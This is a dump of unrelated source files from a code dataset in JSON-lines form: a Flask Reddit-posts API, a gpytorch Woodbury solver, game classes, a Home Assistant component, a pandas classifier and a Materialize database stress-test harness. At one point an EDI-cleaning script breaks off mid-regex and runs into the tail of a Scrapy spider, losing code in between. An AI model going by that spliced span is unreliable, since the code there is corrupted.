get_url(self):\n return url_for('get_student', user_id=self.id, _external=True)\n\n def export_data(self):\n return {\n 'self_url': self.get_url(),\n 'date': self.date,\n 'score': self.score,\n 'domain': self.domain,\n 'title': self.title,\n 'author': self.author,\n 'upVote': self.upVote,\n 'downVote': self.downVote,\n 'comments': self.comments\n }\n\n def import_data(self, data):\n try:\n self.date = data['date']\n self.score = data['score']\n self.domain = data['domain']\n self.title = data['title']\n self.author = data['author']\n self.upVote = data['upVote']\n self.downVote = data['downVote']\n self.comments = data['comments']\n except KeyError as e:\n raise ValidationError('Invalid student: missing ' + e.args[0])\n return self\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return redirect(\"/bmw/\", code=302)\n\n\n@app.route('/bmw/', methods=['GET'])\ndef get_students_api():\n bmw = BMWReddit.query.all()\n return render_template('index.html', bmw=bmw)\n\n\n@app.route('/bmw/modifications/', methods=['GET'])\ndef get_student():\n return render_template('singlepage.html')\n\n\n@app.route('/bmw/insert/', methods=['GET'])\ndef insert_record():\n return render_template('insert.html')\n\n\n@app.route('/bmw/mostcomments/', methods=['GET'])\ndef most_comments():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.comments.desc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('mostcomments.html', bmw=bmw)\n\n\n@app.route('/bmw/highestscore/', methods=['GET'])\ndef highest_score():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.score.desc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('highestscore.html', bmw=bmw)\n\n\n@app.route('/bmw/lowestscore/', methods=['GET'])\ndef lowest_score():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.score.asc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('lowestscore.html', bmw=bmw)\n\n\n##### API\n\n@app.route('/bmw/api/documentation/', methods=['GET'])\ndef get_api():\n return render_template('api.html')\n\n\n@app.route('/bmw/api/', methods=['GET'])\ndef get_students():\n return jsonify({'posts': [post.get_url() for post in BMWReddit.query.all()]})\n\n\n@app.route('/bmw/api/', methods=['GET'])\ndef get_student_api(user_id):\n return jsonify(BMWReddit.query.get_or_404(user_id).export_data())\n\n\n@app.route('/bmw/api/', methods=['POST'])\ndef new_record():\n post = BMWReddit()\n post.import_data(request.json)\n db.session.add(post)\n db.session.commit()\n return jsonify({\"status\": \"record added\"}), 201\n\n\n@app.route('/bmw/api/', methods=['PUT'])\ndef edit_record(user_id):\n post = BMWReddit.query.get_or_404(user_id)\n post.import_data(request.json)\n db.session.add(post)\n db.session.commit()\n return jsonify({\"status\": \"record updated\"})\n\n\n@app.route('/bmw/api/', methods=['DELETE'])\ndef delete_record(user_id):\n record = BMWReddit.query.get_or_404(user_id)\n # print(record)\n db.session.delete(record)\n db.session.commit()\n return jsonify({\"status\": \"record deleted\"})\n\n\n@app.errorhandler(404)\ndef not_found(e):\n return render_template('404.html')\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)","sub_path":"bmw/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"610206885","text":"#!/usr/bin/env python3\n\nimport torch\nfrom .. import settings\n\n\ndef woodbury_factor(umat, vmat, diag, logdet=False):\n r\"\"\"\n Given a matrix factorized as :math:`(D + U V^T)`, where\n :math:`U`, :math:`V` are (n x k) and :math:`D` is a (n x n) diagonal matrix,\n returns the matrix :math:`R` so that\n\n .. math::\n \\begin{equation*}\n R = (I_k + V^T D^-1 U)^{-1} V^T\n \\end{equation*}\n\n to be used in solves with (D + U V^T) via the Woodbury formula.\n Can also be used in batch mode, where U, V, and D are batches of matrices\n\n If the :attr:`logdet=True` flag is set, this function will also return the\n log determinant of :math:`(D + U V^T)`.\n\n Args:\n :attr:`umat` (Tensor n x k):\n The left matrix factor\n :attr:`vmat` (Tensor n x k):\n The right matrix factor\n :attr:`diag` (Tensor n):\n The diagonal of D\n :attr:`logdet` (bool):\n Whether or not to return the log determinant\n\n Returns:\n Tensor (k x n) (if `logdet=False`)\n Tensor (k x n), Tensor () (if `logdet=True`)\n \"\"\"\n if settings.debug.on():\n if umat.shape != vmat.shape:\n raise ValueError(\"umat ({}) and vmat ({}) must have the same shape.\".format(umat.shape, vmat.shape))\n if umat.shape[:-1] != diag.shape:\n raise ValueError(\"Incompatible shape for diag ({}) given umat shape ({}).\".format(diag.shape, umat.shape))\n\n # Sizes\n *batch_shape, n, k = umat.shape\n\n # These reshapes make it easier to use faster blas calls\n umat = umat.view(-1, n, k)\n vmat = vmat.view(-1, n, k)\n diag = diag.view(-1, n, 1)\n\n # Scale the diagonal\n # s = scale = max |1 / diag|\n inv_scale = diag.abs().min()\n scaled_inv_diag = inv_scale / diag\n\n # Compute (1/s (I_k + V^T D^-1 U)), where s is a scale factor\n inner_mat = torch.baddbmm(\n inv_scale,\n torch.eye(k, dtype=scaled_inv_diag.dtype, device=scaled_inv_diag.device),\n 1,\n vmat.transpose(-1, -2),\n umat * scaled_inv_diag\n )\n\n # Compute the cholesky factor of (1/s (I_k + V^T D^-1 U))\n chol = torch.cholesky(inner_mat)\n\n # Compute s (I_k + V^T D^-1 U)^-1 V^T\n R = torch.cholesky_solve(vmat.transpose(-1, -2), chol).view(*batch_shape, k, n)\n\n # Maybe compute the log determinant\n if logdet:\n # Using the matrix determinant lemma here\n logdet = chol.diagonal(dim1=-1, dim2=-2).log().sum(-1).mul(2) - scaled_inv_diag.log().sum([-1, -2])\n # Undo the effect of scaling on D^{-1}\n logdet = logdet + inv_scale.log().mul(n - k)\n # Reshape\n logdet = logdet.view(*batch_shape) if len(batch_shape) else logdet.squeeze()\n return R, inv_scale, logdet\n else:\n return R, inv_scale\n\n\ndef woodbury_solve(rhs, scaled_inv_diag_umat, woodbury_factor, scaled_inv_diag, inv_scale):\n \"\"\"\n Solves the system of equations: :math:`(D + U V^T)x = b` using the Woodbury formula,\n where x is the right-hand-side (size n), U, V are (n x k), and D is a (n x n) diagonal matrix.\n Can also be used in batch mode, where U, V, and D are batches of matrices and rhs is a batch of right-hand-side.\n\n This should be used after calling woodbury_factor.\n\n Args:\n :attr:`rhs` (size n x t)\n Right hand side vector b to solve with.\n :attr:`scaled_inv_diag_umat` (n x k)\n The `D^{-1} U` matrix\n :attr:`woodbury_factor` (n x k)\n The result of calling woodbury_factor on U, V, and D.\n :attr:`diag` (vector)\n The diagonal of D\n \"\"\"\n # (D + UV^T)x = D^-1 x - D^-1 U ((I + V^T D^-1 U)^-1 V^T) D^-1 x\n # = D^-1 x - D^-1 U (1/s (woodbury_factor)) D^-1 x\n # = s( E^-1 x - E^-1 U (woodbury_factor) E^-1 x )\n scaled_inv_diag_rhs = rhs * scaled_inv_diag\n res = torch.add(scaled_inv_diag_rhs, -1, scaled_inv_diag_umat @ (woodbury_factor @ scaled_inv_diag_rhs))\n res = res.div_(inv_scale)\n\n # Reshape the result to be the correct shape\n return res\n","sub_path":"gpytorch/utils/woodbury.py","file_name":"woodbury.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"410525126","text":"\"\"\"https://leetcode.com/problems/combination-sum-ii/\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n ret = []\n self.find(candidates, 0, target, [], ret)\n return ret\n\n def find(self, nums, index, target, result, ret):\n if target < 0:\n return\n elif target == 0:\n if result not in ret:\n ret.append(result)\n else:\n for i in range(index, len(nums)):\n if nums[i] > target:\n break\n else:\n self.find(nums, i + 1, target - nums[i], result + [nums[i]], ret)\n","sub_path":"leetcode/1-100/40-Combination Sum II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"240871790","text":"import re\nimport os\n\nfileLocation = input('Drop file here:\\n')\n\n# os.chdir(\"G:\\Enrollment Management Center\\Evaluation Requests\\EDIs\")\nos.chdir(\"C:/Users/jonng/Documents\")\n\n\nclass CleanLine:\n '''This class cleans the extra blank spaces and changes the line according\n to the data inside'''\n\n def __init__(self, line):\n '''Removes all the extra blank spaces from everyline of the EDI'''\n self.line = re.sub(r'(\\s+)', ' ', line.strip())\n\n def course(self):\n '''This function removes all of the unnecessary information from the\n lines containing coursework'''\n self.line = re.sub(r'(\\W)$', '', self.line)\n self.line = re.sub(r'((\\s)(\\d))$', '', self.line)\n self.line = re.sub(r'((\\s)([E|I]))$', '', self.line)\n self.line = re.sub(r'((I/F))$', 'F', self.line)\n self.line = re.sub(r'((WF|WQ|FX))$', 'F', self.line)\n self.line = re.sub(r'((WL))$', 'W', self.line)\n self.line = re.sub(r'^(WBCT).+', '', self.line)\n return self.line\n\n def names(self):\n '''Makes the line containing names prettier'''\n self.line = re.sub(r'AS: ', '', self.line)\n return self.line\n\n def terms(self):\n '''Changes the term line to a simple *TERM* *YEAR* '''\n if bool(re.search(r'(Mini:)', self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'MINIMESTER', self.line)\n return self.line\n\n elif bool(re.search(r'(Correspondence)',\n self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'CORRESPONDENCE', self.line)\n return self.line\n\n elif bool(re.search(r'(Quarter)',\n self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'Quarter', self.line)\n return self.line\n\n elif bool(re.search(r'(Orientation)', self.line,\n re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'ORIENTATION', self.line)\n return self.line\n\n elif bool(re.search(r'^\\s*(<<:|< 0:\r\n\t\t\tself.noti = Notifier(Id=self._spec_id, item=self.noti_cont)\r\n\t\t\tself.noti.callthespiders()\r\n\t\t\tself.noti_cont = []\r\n\r\n\tdef failed(self, failure):\r\n\t\tself.logger.error(repr(failure))\r\n\t\turl=[]\r\n\t\turl.append(failure.value.response.url)\r\n\t\tpg=self.folder+\"/bad_pages.json\"\r\n\t\tself.red.search_file(pg, url)\r\n \r\nif __name__ == '__main__':\r\n\r\n\tfrom scrapy.crawler import CrawlerProcess\r\n\t# POSTING a valid USER-AGENT\r\n\tprocess = CrawlerProcess({\r\n\t\t\t\t'USER_AGENT': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\\\r\n\t\t\t\t\"Chrome/42.0.2311.135 Safari/537.36 Edge/12.246\",\r\n\t\t\t\t'HTTPPROXY_ENABLED': 'True',\r\n\t\t\t\t'CONCURRENT_REQUESTS': 1,\r\n\t\t\t\t'DNS_TIMEOUT': 10,\r\n\t\t\t\t'DOWNLOAD_TIMEOUT' : 120\r\n\t\t\t})\r\n\r\n\tprocess.crawl(Models1())\r\n\tprocess.start()\r\n","sub_path":"spiders/Russian/sc_rus.py","file_name":"sc_rus.py","file_ext":"py","file_size_in_byte":9688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"368966821","text":"from pico2d import *\nimport gfw\n\nGRAVITY = 0.5\n\nclass Player2:\n\n def __init__(self):\n\n self.x, self.y = get_canvas_width() // 2 + 200, get_canvas_height() // 2 - 197\n self.pos = self.x, self.y\n self.dx = 0\n self.dy = 0\n self.speed = 200\n self.image_walk = gfw.image.load('res/pikachu2_sprite.png')\n self.image = gfw.image.load('res/pikachu2.png')\n self.image_jump = gfw.image.load('res/pikachu_jump2.png')\n self.jump = False\n self.jump_power = 0\n self.jump_direction = 0\n self.jump_sound = load_wav('res/pikachu_jump.wav')\n self.jump_sound.set_volume(10)\n self.radius = 32\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n\n self.time = 0\n self.fidx = 0\n self.keycount = 0\n\n def reset(self):\n self.x, self.y = get_canvas_width() // 2 + 200, get_canvas_height() // 2 - 200\n self.pos = self.x, self.y\n self.dy = 0\n self.dx = 0\n self.jump = False\n self.jump_power = 0\n self.jump_direction = 0\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n self.time = 0\n self.fidx = 0\n self.keycount = 0\n\n def jump_check(self):\n if self.jump == True:\n if self.jump_direction == 1:\n if self.jump_power <= 0:\n self.jump_direction = 2\n self.dy = self.jump_power\n self.jump_power -= GRAVITY\n\n elif self.jump_direction == 2:\n if self.y <= get_canvas_height() // 2 - 200:\n self.jump_direction = 0\n self.jump_power = 0\n self.dy = 0\n self.y = get_canvas_height() // 2 - 200\n self.jump = False\n\n self.dy = self.jump_power\n self.jump_power -= GRAVITY\n\n\n def move_check(self):\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n\n\n def update(self):\n self.move_check()\n self.jump_check()\n self.x += self.dx * gfw.delta_time * self.speed\n if self.x < self.radius:\n self.x = self.radius\n self.y += self.dy * gfw.delta_time * (self.speed // 2)\n if self.x > get_canvas_width() - self.radius:\n self.x = get_canvas_width() - self.radius\n self.pos = self.x, self.y\n\n if self.dx == 1:\n self.time += gfw.delta_time\n elif self.dx == -1:\n self.time -= gfw.delta_time\n frame = self.time * 7\n self.fidx = int(frame) % 7\n\n\n\n\n def draw(self):\n sx = self.fidx * 65\n if self.jump == False and self.dx == 0:\n self.image.draw(*self.pos)\n elif self.jump == False and self.dx != 0:\n self.image_walk.clip_draw(sx, 0, 65, 58, *self.pos)\n elif self.jump == True:\n self.image_jump.clip_draw(sx, 0, 65, 58, *self.pos)\n\n def handle_event(self, e):\n\n if e.type == SDL_KEYDOWN:\n if e.key == SDLK_LEFT:\n if self.dx >= 0:\n self.dx -= 1\n self.keycount += 1\n elif e.key == SDLK_RIGHT:\n if self.dx <= 0:\n self.dx += 1\n self.keycount += 1\n elif e.key == SDLK_UP:\n if self.jump == False:\n self.jump_sound.play()\n self.jump = True\n self.jump_power = 10\n self.jump_direction = 1\n self.time = 0\n self.fidx = 0\n elif e.key == SDLK_DOWN:\n pass\n\n elif e.type == SDL_KEYUP:\n if self.keycount > 0:\n if e.key == SDLK_LEFT:\n if self.dx <= 0:\n self.dx += 1\n self.keycount -= 1\n elif e.key == SDLK_RIGHT:\n if self.dx >= 0:\n self.dx -= 1\n self.keycount -= 1\n elif e.key == SDLK_UP:\n pass\n elif e.key == SDLK_DOWN:\n pass\n\n","sub_path":"기말프로젝트/player2.py","file_name":"player2.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"397402415","text":"#def setup(hass, config):\n # hass.states.set(\"hachina.hello_world\", \"太棒了!\")\n #return True\nimport logging\n#from mcpi.minecraft import Minecraft\n#mc=Minecraft.create(\"47.100.46.95\",4783)\n#entityId= mc.getPlayerEntityId(\"HJN\")\nDOMAIN = \"hachina1\"\nENTITYID = DOMAIN + \".hello_world\"\n \n# 在python中,__name__代表模块名字\n_LOGGER = logging.getLogger(__name__)\n \n \ndef setup(hass, config):\n \"\"\"配置文件加载后,setup被系统调用.\"\"\"\n attr = {\"icon\": \"mdi:face\",\n \"friendly_name\": \"robot\",\n \"slogon\": \"清洁机器人\", }\n hass.states.set(ENTITYID, 'off', attributes=attr)\n \n def change_state(call):\n \"\"\"change_state函数切换改变实体的状态.\"\"\"\n # 记录info级别的日志\n _LOGGER.info(\"hachina's change_state service is called.\")\n \n # 切换改变状态值\n if hass.states.get(ENTITYID).state == 'off':\n hass.states.set(ENTITYID, 'on', attributes=attr)\n with open(\"C:/Users/Administrator.PC-20170611QCUM/Desktop/test/111.txt\",\"w\") as f: \n f.write('True')\n #mc.setBlocks(46,-3,87,116,-3,139,152)\n #mc.setBlock(46,-3,87,0)\n #mc.setBlock(46,-3,139,0)\n #mc.setBlock(116,-3,87,0)\n # mc.setBlock(116,-3,139,0)\n else:\n hass.states.set(ENTITYID, 'off', attributes=attr)\n with open(\"C:/Users/Administrator.PC-20170611QCUM/Desktop/test/111.txt\",\"w\") as f:\n f.write('Flase')\n #mc.setBlocks(46,-3,87,116,-3,139,155)\n \n # 注册服务hachina.change_state\n hass.services.register(DOMAIN, 'change_state', change_state)\n \n return True\n","sub_path":"team/team3/无人超市/ha/custom_components/hachina1.py","file_name":"hachina1.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"497616436","text":"from PIL import ImageGrab\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import asksaveasfile\r\nimport time\r\n\r\nTk().withdraw()\r\nfiles = [(\"Image\", \"*.png\")]\r\npath = asksaveasfile(mode=\"w\", filetypes=files, defaultextension=files, initialfile=\"image.png\")\r\ntry:\r\n path = path.name\r\nexcept:\r\n print(\"Can't Download\")\r\n time.sleep(1)\r\nelse:\r\n img = ImageGrab.grabclipboard()\r\n try:\r\n img.save(path, \"PNG\")\r\n except:\r\n print(\"Can't Download\")\r\n else:\r\n print(\"Saved:\",path)\r\n time.sleep(1)\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"345037036","text":"import pandas as pd\r\n\r\n###### Import Data\r\ndf_2020 = pd.read_csv('Osiris_20_Full_EU17_NonmiGUOTypecopy.csv', na_values = ['n.a.'], encoding='cp1252')\r\ndf_prev = pd.read_csv('Osiris_171819_Full_EU17_NonmiGUOType_Bearbeitet_Ausgefullt.csv', encoding='cp1252')\r\n\r\n### Set Export File's Columns\r\nexport_cols = ['BvDIDnumber', 'Companyname', 'year', 'GUOName', 'GUOType', 'GUODirect', 'ICF', 'FFF'] \r\n\r\n\r\ncompanies = df_2020['BvDIDnumber'].unique()\r\n\r\nfirm_dfs = []\r\nfor company in companies:\r\n df_firm = df_2020.loc[df_2020['BvDIDnumber'] == company]\r\n\r\n ###### Classification\r\n ### Firms Controlled by Individuals\r\n df_firm.loc[(df_firm['GUOType'] == 'One or more named individuals or families') | (df_firm['GUOType'] == 'Employees, managers, directors'), 'ICF'] = 1\r\n df_firm.loc[df_firm['ICF'] != 1, 'ICF'] = 0\r\n\r\n ### Family Founding Firms\r\n df_firm.loc[:, 'FFF'] = ''\r\n df_firm.loc[df_firm['ICF'] == 0, 'FFF'] = 0\r\n\r\n firm_dfs.append(df_firm)\r\n\r\nfirm_dfs.append(df_prev)\r\ndf_total = pd.concat(firm_dfs)\r\ndf_total = df_total[export_cols]\r\ndf_total = df_total.sort_values(by = ['BvDIDnumber', 'year', 'GUODirect'], ascending = True)\r\n\r\n### Carry over Classification from 2019\r\ncompanies = df_total['BvDIDnumber'].unique()\r\nfor company in companies:\r\n df_firm = df_total.loc[df_total['BvDIDnumber'] == company]\r\n # print(df_firm)\r\n if len(df_firm.loc[df_firm['year'] == 2019]) >= 1 and len(df_firm.loc[df_firm['year'] == 2020]) >= 1:\r\n if df_firm.loc[df_firm['year'] == 2019, 'FFF'].values[0] == 1:\r\n GUOname_2019 = df_firm.loc[df_firm['year'] == 2019, 'GUOName'].values[0]\r\n GUOname_2020 = df_firm.loc[df_firm['year'] == 2020, 'GUOName'].values[0]\r\n if GUOname_2019 == GUOname_2020:\r\n df_total.loc[(df_total['year'] == 2020) & (df_total['BvDIDnumber'] == company), 'FFF'] = 1\r\n df_total.loc[(df_total['year'] == 2020) & (df_total['BvDIDnumber'] == company), 'ICF'] = 0\r\n else:\r\n pass\r\n\r\ndf_total.to_csv('test1.csv')\r\n\r\nprint('Finished')","sub_path":"Classification.py","file_name":"Classification.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"242078247","text":"# Copyright Materialize, Inc. and contributors. All rights reserved.\n#\n# Use of this software is governed by the Business Source License\n# included in the LICENSE file at the root of this repository.\n#\n# As of the Change Date specified in that file, in accordance with\n# the Business Source License, use of this software will be governed\n# by the Apache License, Version 2.0.\n\nimport argparse\nimport datetime\nimport os\nimport random\nimport sys\nimport threading\nimport time\nfrom collections import Counter, defaultdict\nfrom typing import DefaultDict, List, Optional, Type\n\nimport pg8000\n\nfrom materialize.mzcompose import Composition\nfrom materialize.mzcompose.services import DEFAULT_SYSTEM_PARAMETERS\nfrom materialize.parallel_workload.action import (\n Action,\n CancelAction,\n KillAction,\n ddl_action_list,\n dml_nontrans_action_list,\n fetch_action_list,\n read_action_list,\n write_action_list,\n)\nfrom materialize.parallel_workload.database import Database\nfrom materialize.parallel_workload.executor import Executor, initialize_logging\nfrom materialize.parallel_workload.settings import Complexity, Scenario\nfrom materialize.parallel_workload.worker import Worker\n\nSEED_RANGE = 1_000_000\nREPORT_TIME = 10\n\n\ndef run(\n host: str,\n port: int,\n system_port: int,\n seed: str,\n runtime: int,\n complexity: Complexity,\n scenario: Scenario,\n num_threads: Optional[int],\n composition: Optional[Composition],\n) -> None:\n num_threads = num_threads or os.cpu_count() or 10\n random.seed(seed)\n\n print(\n f\"--- Running with: --seed={seed} --threads={num_threads} --runtime={runtime} --complexity={complexity.value} --scenario={scenario.value} (--host={host} --port={port})\"\n )\n initialize_logging()\n\n system_conn = pg8000.connect(\n host=host, port=system_port, user=\"mz_system\", database=\"materialize\"\n )\n system_conn.autocommit = True\n with system_conn.cursor() as cur:\n cur.execute(\"ALTER SYSTEM SET max_schemas_per_database = 105\")\n cur.execute(\"ALTER SYSTEM SET max_tables = 105\")\n cur.execute(\"ALTER SYSTEM SET max_materialized_views = 105\")\n cur.execute(\"ALTER SYSTEM SET max_sources = 105\")\n cur.execute(\"ALTER SYSTEM SET max_roles = 105\")\n cur.execute(\"ALTER SYSTEM SET max_clusters = 105\")\n cur.execute(\"ALTER SYSTEM SET max_replicas_per_cluster = 105\")\n system_conn.close()\n\n end_time = (\n datetime.datetime.now() + datetime.timedelta(seconds=runtime)\n ).timestamp()\n\n rng = random.Random(random.randrange(SEED_RANGE))\n database = Database(rng, seed, host, port, system_port, complexity, scenario)\n conn = pg8000.connect(host=host, port=port, user=\"materialize\")\n conn.autocommit = True\n with conn.cursor() as cur:\n database.create(Executor(rng, cur))\n conn.close()\n\n conn = pg8000.connect(\n host=host, port=port, user=\"materialize\", database=str(database)\n )\n conn.autocommit = True\n with conn.cursor() as cur:\n database.create_relations(Executor(rng, cur))\n conn.close()\n\n workers = []\n threads = []\n for i in range(num_threads):\n worker_rng = random.Random(rng.randrange(SEED_RANGE))\n weights: List[float]\n if complexity == Complexity.DDL:\n weights = [60, 30, 30, 30, 10]\n elif complexity == Complexity.DML:\n weights = [60, 30, 30, 30, 0]\n elif complexity == Complexity.Read:\n weights = [60, 30, 0, 0, 0]\n else:\n raise ValueError(f\"Unknown complexity {complexity}\")\n action_list = worker_rng.choices(\n [\n read_action_list,\n fetch_action_list,\n write_action_list,\n dml_nontrans_action_list,\n ddl_action_list,\n ],\n weights,\n )[0]\n actions = [\n action_class(worker_rng, database)\n for action_class in action_list.action_classes\n ]\n worker = Worker(\n worker_rng,\n actions,\n action_list.weights,\n end_time,\n action_list.autocommit,\n system=False,\n )\n thread_name = f\"worker_{i}\"\n print(\n f\"{thread_name}: {', '.join(action_class.__name__ for action_class in action_list.action_classes)}\"\n )\n workers.append(worker)\n\n thread = threading.Thread(\n name=thread_name,\n target=worker.run,\n args=(host, port, \"materialize\", str(database)),\n )\n thread.start()\n threads.append(thread)\n\n if scenario == Scenario.Cancel:\n worker = Worker(\n worker_rng,\n [CancelAction(worker_rng, database, workers)],\n [1],\n end_time,\n autocommit=False,\n system=True,\n )\n workers.append(worker)\n thread = threading.Thread(\n name=\"cancel\",\n target=worker.run,\n args=(host, system_port, \"mz_system\", str(database)),\n )\n thread.start()\n threads.append(thread)\n elif scenario == Scenario.Kill:\n assert composition, \"Kill scenario only works in mzcompose\"\n worker = Worker(\n worker_rng,\n [KillAction(worker_rng, database, composition)],\n [1],\n end_time,\n autocommit=False,\n system=False,\n )\n workers.append(worker)\n thread = threading.Thread(\n name=\"kill\",\n target=worker.run,\n args=(host, port, \"materialize\", str(database)),\n )\n thread.start()\n threads.append(thread)\n elif scenario == Scenario.Regression:\n pass\n else:\n raise ValueError(f\"Unknown scenario {scenario}\")\n\n num_queries = 0\n try:\n while time.time() < end_time:\n for thread in threads:\n if not thread.is_alive():\n for worker in workers:\n worker.end_time = time.time()\n raise Exception(f\"Thread {thread.name} failed, exiting\")\n time.sleep(REPORT_TIME)\n print(\n \"QPS: \"\n + \" \".join(\n f\"{worker.num_queries / REPORT_TIME:05.1f}\" for worker in workers\n )\n )\n for worker in workers:\n num_queries += worker.num_queries\n worker.num_queries = 0\n except KeyboardInterrupt:\n print(\"Keyboard interrupt, exiting\")\n for worker in workers:\n worker.end_time = time.time()\n\n for thread in threads:\n thread.join()\n\n conn = pg8000.connect(host=host, port=port, user=\"materialize\")\n conn.autocommit = True\n with conn.cursor() as cur:\n print(f\"Dropping database {database}\")\n database.drop(Executor(rng, cur))\n conn.close()\n\n ignored_errors: DefaultDict[str, Counter[Type[Action]]] = defaultdict(Counter)\n num_failures = 0\n for worker in workers:\n for action_class, counter in worker.ignored_errors.items():\n ignored_errors[action_class].update(counter)\n for counter in ignored_errors.values():\n for count in counter.values():\n num_failures += count\n\n failed = 100.0 * num_failures / num_queries if num_queries else 0\n print(f\"Queries executed: {num_queries} ({failed:.0f}% failed)\")\n print(\"Error statistics:\")\n for error, counter in ignored_errors.items():\n text = \", \".join(\n f\"{action_class.__name__}: {count}\"\n for action_class, count in counter.items()\n )\n print(f\" {error}: {text}\")\n\n\ndef parse_common_args(parser: argparse.ArgumentParser) -> None:\n parser.add_argument(\"--seed\", type=str, default=str(int(time.time())))\n parser.add_argument(\"--runtime\", default=600, type=int, help=\"Runtime in seconds\")\n parser.add_argument(\n \"--complexity\",\n default=\"ddl\",\n type=str,\n choices=[elem.value for elem in Complexity],\n )\n parser.add_argument(\n \"--scenario\",\n default=\"regression\",\n type=str,\n choices=[elem.value for elem in Scenario],\n )\n parser.add_argument(\n \"--threads\",\n type=int,\n help=\"Number of threads to run, by default number of SMT threads\",\n )\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser(\n prog=\"parallel-workload\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Run a parallel workload againt Materialize\",\n )\n\n parser.add_argument(\"--host\", default=\"localhost\", type=str)\n parser.add_argument(\"--port\", default=6875, type=int)\n parser.add_argument(\"--system-port\", default=6877, type=int)\n parse_common_args(parser)\n\n args = parser.parse_args()\n\n system_conn = pg8000.connect(\n host=args.host, port=args.system_port, user=\"mz_system\", database=\"materialize\"\n )\n system_conn.autocommit = True\n with system_conn.cursor() as cur:\n # TODO: Currently the same as mzcompose default settings, add\n # more settings and shuffle them\n for key, value in DEFAULT_SYSTEM_PARAMETERS.items():\n cur.execute(f\"ALTER SYSTEM SET {key} = '{value}'\")\n system_conn.close()\n\n run(\n args.host,\n args.port,\n args.system_port,\n args.seed,\n args.runtime,\n Complexity(args.complexity),\n Scenario(args.scenario),\n args.threads,\n composition=None, # only works in mzcompose\n )\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"misc/python/materialize/parallel_workload/parallel_workload.py","file_name":"parallel_workload.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"638646082","text":"from Player import *\nimport datetime\n\nclass GUI():\n \n def __init__(self):\n self.playerSlot = 0\n self.type = \"player\"\n \n def drawGui(self, Game, Cam):\n \"\"\"Draw GUI and various aspects like abilities, etc.\"\"\"\n fill(103, 108, 126, 200)\n x = -Cam.xshift + 430 # Top left corner of the GUI panel\n y = -Cam.yshift + 930\n w = 1100\n h = 150\n \n # Allows for viewing attributes of any Attackable\n if(self.type == \"player\"):\n p1 = Game.PT.players[self.playerSlot]\n elif(self.type == \"structure\"):\n p1 = Game.ST.structures[self.playerSlot]\n elif(self.type == \"creep\"):\n p1 = Game.CT.creep[self.playerSlot]\n else:\n p1 = Game.PT.players[0]\n\n rect(x,y, w, h) # GUI panel\n\n # Game Time bar\n gtbx = -Cam.xshift + width/2\n gtby = -Cam.yshift\n quad(gtbx - 75, gtby, gtbx + 75, gtby, gtbx + 55, gtby+55, gtbx - 55, gtby+55)\n \n # Game Time text\n fill(255)\n textSize(20)\n time = datetime.timedelta(seconds = Game.time)\n text(str(time), gtbx, gtby + 35)\n \n # Health bar background\n fill(0,0,0)\n rect(x + 250, y + 70, 600, 50, 5, 5, 5, 5)\n # Health bar foreground\n fill(0,204,20)\n if(p1.hp >= 0):\n rect(x + 250, y + 70, round(600 * p1.hp/p1.hpMax), 50, 5, 5, 5, 5)\n \n if(self.type == \"player\"): \n # Experience bar background \n fill(0,0,0, 100)\n rect(x + 25, y + 70, 200, 50, 5, 5, 5, 5)\n # Experience bar foreground \n fill(255, 190, 0)\n if(p1.lvl < 25):\n rect(x + 25, y + 70, round(200 * p1.xp/xpToLevel[p1.lvl]), 50, 5, 5, 5, 5)\n else:\n rect(x + 25, y + 70, 200, 50, 5, 5, 5, 5)\n \n # Ability bar background \n fill(0,0,0, 50)\n rect(x + 850 + 20, y + 35, 100, 100)\n rect(x + 850 + 130, y + 35, 100, 100)\n \n if(self.type == \"player\"): # Only players have ability cooldowns \n # Ability bar foreground\n fill(0,0,0,150)\n index = -1\n for i in range(0,len(Game.PT.players[self.playerSlot].debuffs)):\n if(Game.PT.players[self.playerSlot].debuffs[i].debuff == \"ab1cd\"):\n index = int(i)\n break\n if(index != -1):\n rect(x + 850 